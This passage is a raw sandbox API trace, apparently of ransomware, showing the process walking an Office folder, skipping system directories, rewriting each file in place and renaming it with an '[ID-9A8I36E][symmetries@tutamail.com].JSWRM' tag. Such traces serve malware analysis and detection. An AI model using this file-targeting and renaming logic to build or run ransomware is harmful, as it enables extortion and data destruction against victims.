cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0114.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0114.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0114.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0114.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0114.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0114.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0114.600] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0114.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0114.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0114.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0114.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0114.601] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ac4a8a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ac4a8a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3dba42, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_ONLINE_K_COL.HXK", cAlternateFileName="LYNC_O~1.HXK")) returned 1 [0114.602] lstrcmpiW (lpString1="LYNC_ONLINE_K_COL.HXK", lpString2=".") returned 1 [0114.602] lstrcmpiW (lpString1="LYNC_ONLINE_K_COL.HXK", lpString2="..") returned 1 [0114.602] lstrcmpiW (lpString1="LYNC_ONLINE_K_COL.HXK", lpString2="...") returned 1 [0114.602] lstrcmpiW (lpString1="LYNC_ONLINE_K_COL.HXK", lpString2="windows") returned -1 [0114.602] lstrcmpiW (lpString1="LYNC_ONLINE_K_COL.HXK", lpString2="recovery") returned -1 [0114.602] lstrcmpiW (lpString1="LYNC_ONLINE_K_COL.HXK", lpString2="perflogs") returned -1 [0114.602] lstrcmpiW (lpString1="LYNC_ONLINE_K_COL.HXK", lpString2="documents and settings") returned 1 [0114.602] lstrcmpiW (lpString1="LYNC_ONLINE_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.602] lstrcmpiW (lpString1="LYNC_ONLINE_K_COL.HXK", lpString2="system volume information") returned -1 [0114.602] lstrcmpiW (lpString1="LYNC_ONLINE_K_COL.HXK", lpString2="msocache") returned -1 [0114.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_K_COL.HXK", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0114.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0114.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_K_COL.HXK", cchWideChar=21, lpMultiByteStr=0x241268, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ONLINE_K_COL.HXK", lpUsedDefaultChar=0x0) returned 21 [0114.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_K_COL.HXK", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0114.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0114.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_K_COL.HXK", cchWideChar=21, lpMultiByteStr=0x241010, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ONLINE_K_COL.HXK", lpUsedDefaultChar=0x0) returned 21 [0114.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0114.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0114.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0114.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.603] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0114.603] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0114.603] ReadFile (in: hFile=0x238, lpBuffer=0x209788, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209788*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0114.604] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.604] WriteFile (in: hFile=0x238, lpBuffer=0x209788*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209788*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0114.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0114.604] CloseHandle (hObject=0x238) returned 1 [0114.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0114.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0114.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0114.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0114.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0114.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0114.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.605] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0114.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0114.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0114.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0114.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0114.606] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca8e89fe, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca8e89fe, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdb60697b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x136a50, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MAPIR.DLL", cAlternateFileName="")) returned 1 [0114.606] lstrcmpiW (lpString1="MAPIR.DLL", lpString2=".") returned 1 [0114.606] lstrcmpiW (lpString1="MAPIR.DLL", lpString2="..") returned 1 [0114.606] lstrcmpiW (lpString1="MAPIR.DLL", lpString2="...") returned 1 [0114.606] lstrcmpiW (lpString1="MAPIR.DLL", lpString2="windows") returned -1 [0114.606] lstrcmpiW (lpString1="MAPIR.DLL", lpString2="recovery") returned -1 [0114.606] lstrcmpiW (lpString1="MAPIR.DLL", lpString2="perflogs") returned -1 [0114.606] lstrcmpiW (lpString1="MAPIR.DLL", lpString2="documents and settings") returned 1 [0114.606] lstrcmpiW (lpString1="MAPIR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0114.606] lstrcmpiW (lpString1="MAPIR.DLL", lpString2="system volume information") returned -1 [0114.606] lstrcmpiW (lpString1="MAPIR.DLL", lpString2="msocache") returned -1 [0114.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0114.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIR.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIR.DLL", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPIR.DLL", lpUsedDefaultChar=0x0) returned 9 [0114.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0114.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0114.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIR.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIR.DLL", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPIR.DLL", lpUsedDefaultChar=0x0) returned 9 [0114.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0114.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0114.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0114.607] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb8dc6bb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb8dc6bb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeba33b90, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b6b8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MAPISHELLR.DLL", cAlternateFileName="MAPISH~1.DLL")) returned 1 [0114.607] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2=".") returned 1 [0114.607] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2="..") returned 1 [0114.607] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2="...") returned 1 [0114.607] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2="windows") returned -1 [0114.607] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2="recovery") returned -1 [0114.607] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2="perflogs") returned -1 [0114.607] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2="documents and settings") returned 1 [0114.607] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0114.607] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2="system volume information") returned -1 [0114.607] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2="msocache") returned -1 [0114.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0114.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPISHELLR.DLL", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPISHELLR.DLL", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPISHELLR.DLL", lpUsedDefaultChar=0x0) returned 14 [0114.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0114.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0114.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPISHELLR.DLL", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPISHELLR.DLL", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPISHELLR.DLL", lpUsedDefaultChar=0x0) returned 14 [0114.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0114.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0114.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0114.607] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec51479d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec51479d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9b5d49a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6ce48, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MOR6INT.DLL", cAlternateFileName="")) returned 1 [0114.607] lstrcmpiW (lpString1="MOR6INT.DLL", lpString2=".") returned 1 [0114.607] lstrcmpiW (lpString1="MOR6INT.DLL", lpString2="..") returned 1 [0114.607] lstrcmpiW (lpString1="MOR6INT.DLL", lpString2="...") returned 1 [0114.607] lstrcmpiW (lpString1="MOR6INT.DLL", lpString2="windows") returned -1 [0114.607] lstrcmpiW (lpString1="MOR6INT.DLL", lpString2="recovery") returned -1 [0114.607] lstrcmpiW (lpString1="MOR6INT.DLL", lpString2="perflogs") returned -1 [0114.607] lstrcmpiW (lpString1="MOR6INT.DLL", lpString2="documents and settings") returned 1 [0114.607] lstrcmpiW (lpString1="MOR6INT.DLL", lpString2="$RECYCLE.BIN") returned 1 [0114.607] lstrcmpiW (lpString1="MOR6INT.DLL", lpString2="system volume information") returned -1 [0114.607] lstrcmpiW (lpString1="MOR6INT.DLL", lpString2="msocache") returned -1 [0114.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0114.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOR6INT.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOR6INT.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MOR6INT.DLL", lpUsedDefaultChar=0x0) returned 11 [0114.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0114.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0114.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOR6INT.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOR6INT.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MOR6INT.DLL", lpUsedDefaultChar=0x0) returned 11 [0114.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0114.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0114.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0114.608] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x468bdf3, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x468bdf3, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x468bdf3, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x58c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MOVE.VRD", cAlternateFileName="")) returned 1 [0114.608] lstrcmpiW (lpString1="MOVE.VRD", lpString2=".") returned 1 [0114.608] lstrcmpiW (lpString1="MOVE.VRD", lpString2="..") returned 1 [0114.608] lstrcmpiW (lpString1="MOVE.VRD", lpString2="...") returned 1 [0114.608] lstrcmpiW (lpString1="MOVE.VRD", lpString2="windows") returned -1 [0114.608] lstrcmpiW (lpString1="MOVE.VRD", lpString2="recovery") returned -1 [0114.608] lstrcmpiW (lpString1="MOVE.VRD", lpString2="perflogs") returned -1 [0114.608] lstrcmpiW (lpString1="MOVE.VRD", lpString2="documents and settings") returned 1 [0114.608] lstrcmpiW (lpString1="MOVE.VRD", lpString2="$RECYCLE.BIN") returned 1 [0114.608] lstrcmpiW (lpString1="MOVE.VRD", lpString2="system volume information") returned -1 [0114.608] lstrcmpiW (lpString1="MOVE.VRD", lpString2="msocache") returned -1 [0114.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0114.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOVE.VRD", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0114.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOVE.VRD", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MOVE.VRD", lpUsedDefaultChar=0x0) returned 8 [0114.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0114.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0114.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOVE.VRD", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0114.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOVE.VRD", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MOVE.VRD", lpUsedDefaultChar=0x0) returned 8 [0114.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0114.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0114.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0114.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0114.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MOVE.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\move.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.609] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1420) returned 1 [0114.609] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x580) returned 0x2332c0 [0114.609] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x580, lpOverlapped=0x0) returned 1 [0114.611] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.611] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x580, lpOverlapped=0x0) returned 1 [0114.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 